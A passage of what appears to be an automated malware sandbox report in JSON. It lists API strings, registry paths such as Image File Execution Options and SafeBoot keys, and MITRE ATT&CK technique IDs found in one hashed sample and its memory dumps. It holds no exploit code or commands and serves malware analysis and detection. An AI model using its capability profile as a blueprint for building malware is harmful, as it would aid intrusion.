00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateDirectoryW\" (Indicator: \"CreateDirectory\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateDirectoryA\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"CreateDirectoryW\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateFileMappingA\" (Indicator: \"CreateFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"CreateFileW\" (Indicator: \"CreateFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"CreateFileMappingA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"WinExec\" (Indicator: \"WinExec\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"ShellExecuteExA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00419000.00000080.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"WinExec\" (Indicator: \"WinExec\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Windows\\CurrentVersion\" in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\n \"SYSTEM\\CurrentControlSet\\Services\\%s\" in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\n \"SYSTEM\\CurrentControlSet\\Services\" in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\n \"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\" in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\n \"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\" in Source: 234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\n \"Software\\Microsoft\\Windows\\CurrentVersion\" in Source: 00000000-00005280.00000000.138163.00412000.00000040.mdmp\n 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00412000.00000040.mdmp\n \"\\Software\\ _Classes\\ !\\Software\\Microsoft\\\" in Source: 00000000-00005280.00000000.138163.004E0000.00000004.mdmp\n 00000000-00005280.00000001.138657.004E0000.00000004.mdmp\n \"\\REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00640000.00000004.mdmp\n \"\\Software\\\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00640000.00000004.mdmp\n \"!\\Software\\Microsoft\\\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00640000.00000004.mdmp\n \"\\REGISTRY\\USER\\S-1-5-21-2092356043-4041700817-663127204-1001\\Software\\Microsoft\\\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00640000.00000004.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\%s\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00424000.00000080.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00424000.00000080.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00424000.00000080.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00424000.00000080.mdmp\n \"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00424000.00000080.mdmp\n \"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\" in Source: 00000000-00005280.00000000.138163.00640000.00000004.mdmp\n 00000000-00005280.00000001.138657.00424000.00000080.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateProcessAsUserA\" (Indicator: \"CreateProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")\n Found reference to API \"CreateProcessAsUserA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005280.00000000.138163.00640000.00000004.mdmp, 00000000-00005280.00000001.138657.00424000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"LookupPrivilegeValueA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OpenProcessToken\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetFileSecurityW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetFileSecurityA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DeleteObject\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FileTimeToDosDateTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FileTimeToSystemTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WaitForSingleObject\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FreeLibrary\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FindNextFileA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ExitProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetVersionExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetFileAttributesW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetModuleFileNameA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"HeapAlloc\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetDateFormatA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DosDateTimeToFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetLocaleInfoA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateDirectoryA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DeleteFileA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetCurrentDirectoryA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"MultiByteToWideChar\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateDirectoryW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DeleteFileW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetProcAddress\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetFileType\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetFileAttributesA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetFilePointer\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetTempPathA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetFileAttributesW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WideCharToMultiByte\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"lstrcmpiA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetModuleHandleA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FindNextFileW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WriteFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FindFirstFileA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CloseHandle\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetTimeFormatA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetCommandLineA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FindFirstFileW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"MoveFileExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ExpandEnvironmentStringsA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FileTimeToLocalFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetFullPathNameA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetProcessHeap\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"LocalFree\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"MoveFileA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetNumberFormatA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateFileW\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"LocalFileTimeToFileTime\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FindClose\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"Sleep\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FormatMessageA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetEndOfFile\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateFileA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetTickCount\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FindResourceA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetCurrentDirectoryA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CompareStringA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OleUninitialize\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CoCreateInstance\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OleInitialize\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SHGetFileInfoA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ShellExecuteExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SHGetSpecialFolderLocation\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SHBrowseForFolderA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SHGetPathFromIDListA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SHGetMalloc\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SHFileOperationA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"MapWindowPoints\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetMessageA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetFocus\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ShowWindow\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"wsprintfA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CharToOemBuffA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OemToCharBuffA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetWindowRect\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DispatchMessageA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"EnableWindow\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetMenu\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"PostMessageA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"MessageBoxA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"PeekMessageA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"wvsprintfA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"TranslateMessage\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetWindow\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CharUpperA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetSysColor\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetWindowLongA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SetWindowTextA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DestroyIcon\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"LoadStringA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetSystemMetrics\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"SendMessageA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetClientRect\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"OemToCharA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetWindowLongA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FindWindowExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateWindowExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"LoadIconA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetClassNameA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetWindowTextA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"DestroyWindow\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"CreateProcessA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"lstrcatA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"ZwQuerySystemInformation\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"InternetOpenA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"InternetOpenUrlA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"HttpQueryInfoA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"InternetReadFileExA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"InternetCloseHandle\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"InternetSetStatusCallback\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"MmGetSystemRoutineAddress\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"Thread32First\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"PathFileExistsA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WSAAddressToStringA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"GetAdaptersInfo\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WNetCancelConnection2A\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WNetAddConnection2A\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WNetCloseEnum\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"WNetOpenEnumA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"UuidToStringA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"UuidFromStringA\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"FreeResource\"; File: \"234fdea3ae1f20f2fd031b204511b9eb676b781b04b2a494a34da9c380d92f8c\")\n Found reference to API (Indicator: \"lstrlenA\"; File: 